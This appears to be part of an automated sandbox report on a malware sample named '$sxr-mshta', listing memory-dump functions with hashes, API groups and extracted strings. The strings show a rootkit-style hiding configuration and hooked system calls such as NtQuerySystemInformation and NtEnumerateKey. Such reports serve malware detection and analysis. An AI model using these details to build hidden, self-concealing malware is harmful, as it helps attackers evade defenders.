                                                                                                            • Opcode ID: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                            • Instruction ID: 14bf8d0c2ebe5fe5bf4a41482183571988ed84d3eed68f1bcc8515b10a2eb459
                                                                                                            • Opcode Fuzzy Hash: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                            • Instruction Fuzzy Hash: 1431A272302B808EEB608F68E8407ED7760F78574AF44802ADA8E57B95DF38C548C750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1239891234-0
                                                                                                            • Opcode ID: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                            • Instruction ID: 4c082cc9b46a12a4ff83e2f63ed2fb3b50bc58d30a4a487a732a2ceb36c8e9b4
                                                                                                            • Opcode Fuzzy Hash: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                            • Instruction Fuzzy Hash: 4131C436315F809ADB20CF29E8407DE37A0F789755F504116EA9D53B95DF38C545CB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                            • String ID:
                                                                                                            • API String ID: 1443284424-0
                                                                                                            • Opcode ID: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                            • Instruction ID: f075b858299845cf7ae963e4c83b004bac1486a2d2b440fad124134e81e63d0e
                                                                                                            • Opcode Fuzzy Hash: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                            • Instruction Fuzzy Hash: 6FE11272709A809EE702CF68D0802DD7FB1F346789F158116EE4E6BB99DA38C55BC781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                                                                            • API String ID: 3215553584-1407779936
                                                                                                            • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                            • Instruction ID: 0974ccd98fc7b9cab5d1c040b5a3b9264d1ca2e249b3198ec3b5983a8dd0c499
                                                                                                            • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                            • Instruction Fuzzy Hash: C9510372712B5485EF10DFE6A8106DDABA5FB5EBD4FC44921DE0D87B85EB38C0418381
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3381060443.00007FF64E1D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64E1D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380937686.00007FF64E1D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000A.00000002.3381242607.00007FF64E1D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_7ff64e1d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1249254920-0
                                                                                                            • Opcode ID: 9cf6c44da13e02a05fc4d3dcc4ca3e30ed2f46184eaf7001aa2c8df375b04596
                                                                                                            • Instruction ID: eff9436ee664a6a6fb3846fbd81a6564da1ef290e4bb1e821d34349bbfc16670
                                                                                                            • Opcode Fuzzy Hash: 9cf6c44da13e02a05fc4d3dcc4ca3e30ed2f46184eaf7001aa2c8df375b04596
                                                                                                            • Instruction Fuzzy Hash: 56D0C759E4C507D6FB1837716C5543552609F6CB51F059034DB2B87310DD3C7486CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e98009fc70158ea5415607d79adf01d037d59db10dc6a2a59361e2c62c52725f
                                                                                                            • Instruction ID: 1804976eeac7f45a8791683f7552c3acd3cea74bf78669456bcb59303b6c1cf9
                                                                                                            • Opcode Fuzzy Hash: e98009fc70158ea5415607d79adf01d037d59db10dc6a2a59361e2c62c52725f
                                                                                                            • Instruction Fuzzy Hash: 6951F0327056909DFB209B7AA9002DE7FA5B746BE5F148215EE9C67F8ACB38C501C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3381060443.00007FF64E1D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64E1D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380937686.00007FF64E1D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000A.00000002.3381242607.00007FF64E1D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_7ff64e1d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: d18d6d85a8f617bb5500e753f487753302b7fe5cd23ded35b267988b4d6b386f
                                                                                                            • Instruction ID: be70d6fb7d9730957015856da2115a43447da22d2a682f9b348507b9cec9baeb
                                                                                                            • Opcode Fuzzy Hash: d18d6d85a8f617bb5500e753f487753302b7fe5cd23ded35b267988b4d6b386f
                                                                                                            • Instruction Fuzzy Hash: E8B09218FA9402E1E604BB619C8146012A0AB68720FC10430D10DC2120DE5CA19A8F00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 02a0dc21c4cc38a4ec26d0a9d58c393b00474c81d7d375ca2079895bfbc551e1
                                                                                                            • Instruction ID: 27e0c2f26730fa75359452f94bcff31a48825c71f4b90babbe0e480e9d18d965
                                                                                                            • Opcode Fuzzy Hash: 02a0dc21c4cc38a4ec26d0a9d58c393b00474c81d7d375ca2079895bfbc551e1
                                                                                                            • Instruction Fuzzy Hash: F4F068727152548AEB95CF69A442B997BE0F34C3C0F808519D68AC3B14D33C84509F45
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7465cf9d9df8522566c1825c6aca6e7efb4b7e8f362465355fb385eb86a5387d
                                                                                                            • Instruction ID: fef43c8687809109f500699dc2f355aac25a11132c3f1021da8e4966bfd68607
                                                                                                            • Opcode Fuzzy Hash: 7465cf9d9df8522566c1825c6aca6e7efb4b7e8f362465355fb385eb86a5387d
                                                                                                            • Instruction Fuzzy Hash: C2E0C07BB0F6C11EE6A34A1C4C6A1882F90F767B22F09C04ECBE463283D1060C418757
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                            • String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                            • API String ID: 106492572-3028563969
                                                                                                            • Opcode ID: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction ID: 942e08efff57fe41156c140f0d67fc0396b61bf0044a7856eccda8ee7dfdfdc0
                                                                                                            • Opcode Fuzzy Hash: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction Fuzzy Hash: 35714D36312A5089EB11EF69E8806DD3BB5FB86B8AF009511DE4D67F29DF38C584C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
                                                                                                            • API String ID: 1741086925-759476645
                                                                                                            • Opcode ID: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction ID: 69bede8bcbc7ef82e6cdb30a2f2d91b74dad5c58e0fbb65e3ff6cae2bf28b7b3
                                                                                                            • Opcode Fuzzy Hash: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction Fuzzy Hash: 2E419A74313A4AA8FA06DB6CE9516D42B34A746347F82D413D40D32177DE78C6C9D3E2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                            • String ID: d
                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                            • Opcode ID: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                            • Instruction ID: 6a151138ffa7dbc73349005a95e2520a116a532a86707507cf6ee88cab1e77ca
                                                                                                            • Opcode Fuzzy Hash: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                            • Instruction Fuzzy Hash: 1F516C72305B849BE715CF66E5483AABBA1F78AB82F44C128DB4D17B14DF38C195C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                            • String ID: \\.\pipe\$sxrchildproc34226543a32$\\.\pipe\$sxrchildproc38764243a64
                                                                                                            • API String ID: 2171963597-1213686612
                                                                                                            • Opcode ID: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                            • Instruction ID: 40936ec3964d45e28d32eaa577eb0f4003091f120f49a7850a50184811bc72c8
                                                                                                            • Opcode Fuzzy Hash: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                            • Instruction Fuzzy Hash: 6321713671575097FB14CB29F4043A97BA0F386BA6F508215DA5E12FA8CF3CC189CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                            • String ID: d
                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                            • Opcode ID: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                            • Instruction ID: 778158212f534029580ab6218e0794010b35d079fe21a56bb590d838d6aa9a83
                                                                                                            • Opcode Fuzzy Hash: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                            • Instruction Fuzzy Hash: 52417133215B809BE7608F65E5447DABBA1F38AB86F008129DB8D17B54DF38D1A5CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 190073905-0
                                                                                                            • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction ID: 5647a49a26bf4c4f51703fa53c1e03839352a16dd976af18536983204f530c3e
                                                                                                            • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction Fuzzy Hash: D181CF317022418EFF55AB6E98413E92E91AB87783F149425DA0DB7797EB3CC98187C2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 412 1ace9006a90-1ace9006a96 413 1ace9006ad1-1ace9006adb 412->413 414 1ace9006a98-1ace9006a9b 412->414 417 1ace9006bf8-1ace9006c0d 413->417 415 1ace9006a9d-1ace9006aa0 414->415 416 1ace9006ac5-1ace9006b04 call 1ace9007140 414->416 418 1ace9006aa2-1ace9006aa5 415->418 419 1ace9006ab8 __scrt_dllmain_crt_thread_attach 415->419 435 1ace9006bd2 416->435 436 1ace9006b0a-1ace9006b1f call 1ace9006fd4 416->436 420 1ace9006c1c-1ace9006c36 call 1ace9006fd4 417->420 421 1ace9006c0f 417->421 423 1ace9006ab1-1ace9006ab6 call 1ace9007084 418->423 424 1ace9006aa7-1ace9006ab0 418->424 427 1ace9006abd-1ace9006ac4 419->427 433 1ace9006c6f-1ace9006ca0 call 1ace9007310 420->433 434 1ace9006c38-1ace9006c6d call 1ace90070fc call 1ace9006f9c call 1ace9007498 call 1ace90072b0 call 1ace90072d4 call 1ace900712c 420->434 425 1ace9006c11-1ace9006c1b 421->425 423->427 446 1ace9006cb1-1ace9006cb7 433->446 447 1ace9006ca2-1ace9006ca8 433->447 434->425 439 1ace9006bd4-1ace9006be9 435->439 444 1ace9006b25-1ace9006b36 call 1ace9007044 436->444 445 1ace9006bea-1ace9006bf7 call 1ace9007310 436->445 462 1ace9006b87-1ace9006b91 call 1ace90072b0 444->462 463 1ace9006b38-1ace9006b5c call 1ace900745c call 1ace9006f8c call 1ace9006fb8 call 1ace900917c 444->463 445->417 452 1ace9006cfe-1ace9006d14 call 1ace90028f0 446->452 453 1ace9006cb9-1ace9006cc3 446->453 447->446 451 1ace9006caa-1ace9006cac 447->451 458 1ace9006d9f-1ace9006dac 451->458 471 1ace9006d4c-1ace9006d4e 452->471 472 1ace9006d16-1ace9006d18 452->472 459 1ace9006ccf-1ace9006cdd call 1ace9012768 453->459 460 1ace9006cc5-1ace9006ccd 453->460 465 1ace9006ce3-1ace9006cf8 call 1ace9006a90 459->465 475 1ace9006d95-1ace9006d9d 459->475 460->465 462->435 485 1ace9006b93-1ace9006b9f call 1ace9007300 462->485 463->462 515 1ace9006b5e-1ace9006b65 __scrt_dllmain_after_initialize_c 463->515 465->452 465->475 481 1ace9006d50-1ace9006d53 471->481 482 1ace9006d55-1ace9006d6a call 1ace9006a90 471->482 472->471 480 1ace9006d1a-1ace9006d3c call 1ace90028f0 call 1ace9006bf8 472->480 475->458 480->471 509 1ace9006d3e-1ace9006d46 call 1ace9012768 480->509 481->475 481->482 482->475 495 1ace9006d6c-1ace9006d76 482->495 502 1ace9006ba1-1ace9006bab call 1ace9007218 485->502 503 1ace9006bc5-1ace9006bd0 485->503 500 1ace9006d81-1ace9006d91 call 1ace9012768 495->500 501 1ace9006d78-1ace9006d7f 495->501 500->475 501->475 502->503 514 1ace9006bad-1ace9006bbb 502->514 503->439 509->471 514->503 515->462 516 1ace9006b67-1ace9006b84 call 1ace9009118 515->516 516->462
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 190073905-0
                                                                                                            • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction ID: 6117682b80ba718a5a92e8ab5a7f09ef1c50c304bd28b51c3ba6235488525097
                                                                                                            • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction Fuzzy Hash: 9481057270364186FA51ABE698413D9EEE2B74F780FC44E259A05C7796DF38C881A7C3
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                            • String ID: api-ms-
                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                            • Opcode ID: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                            • Instruction ID: 5f3f069d4a4415dbc069c0bfeb4c18b31f89ab0407aaf717dcd4bdf8aa866b38
                                                                                                            • Opcode Fuzzy Hash: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                            • Instruction Fuzzy Hash: A3310B31313780A9EE12DB0EE9007D96B94F746BA6F194525FD2D6BB95DF38C144C382
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                            • String ID: CONOUT$
                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                            • Opcode ID: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                            • Instruction ID: c0662b82667819f83d8a447fa925f11b530f544bf5b73c1cc39cc5b34c84c6c7
                                                                                                            • Opcode Fuzzy Hash: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                            • Instruction Fuzzy Hash: 8011EB31311B408BE3518B4AF8443997BA0F79AFE6F00C224EE1D97794DF38C9848782
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Current$Context
                                                                                                            • String ID:
                                                                                                            • API String ID: 1666949209-0
                                                                                                            • Opcode ID: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                            • Instruction ID: cda0b591bae2059604ab7f700e02ec0491f1ed4cec0426b5c0b3d43ffae0e199
                                                                                                            • Opcode Fuzzy Hash: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                            • Instruction Fuzzy Hash: 60D1EB36309B888ADA30DB1AE49039A7BA0F789B85F104216EACD57BA5DF7CC551CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                            • String ID: $sxr
                                                                                                            • API String ID: 756756679-21942930
                                                                                                            • Opcode ID: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                            • Instruction ID: 35d7d65ea24e8c9606904751b73a09850b7c3e5515182974f7649a518509ab7e
                                                                                                            • Opcode Fuzzy Hash: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                            • Instruction Fuzzy Hash: 4D310932B03B518AE711DF5EE8443A96BA0FB46B82F08C024DF5C17B55EF38C8A18781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3381060443.00007FF64E1D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64E1D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380937686.00007FF64E1D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000A.00000002.3381242607.00007FF64E1D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_7ff64e1d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 4104442557-0
                                                                                                            • Opcode ID: 3aee56793f856ebc4bf5ed15d236b07679841bd6bfcb628e62788a85eda43e84
                                                                                                            • Instruction ID: 7ae107239ebcff26f3243485f8746d55a8349dc3964719a9bf1083d2d7c18fbd
                                                                                                            • Opcode Fuzzy Hash: 3aee56793f856ebc4bf5ed15d236b07679841bd6bfcb628e62788a85eda43e84
                                                                                                            • Instruction Fuzzy Hash: 3E114D2AA48B468AEB10EF70E8446A933A4FB19758F400A30FA6D87754DF7CE5A4C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
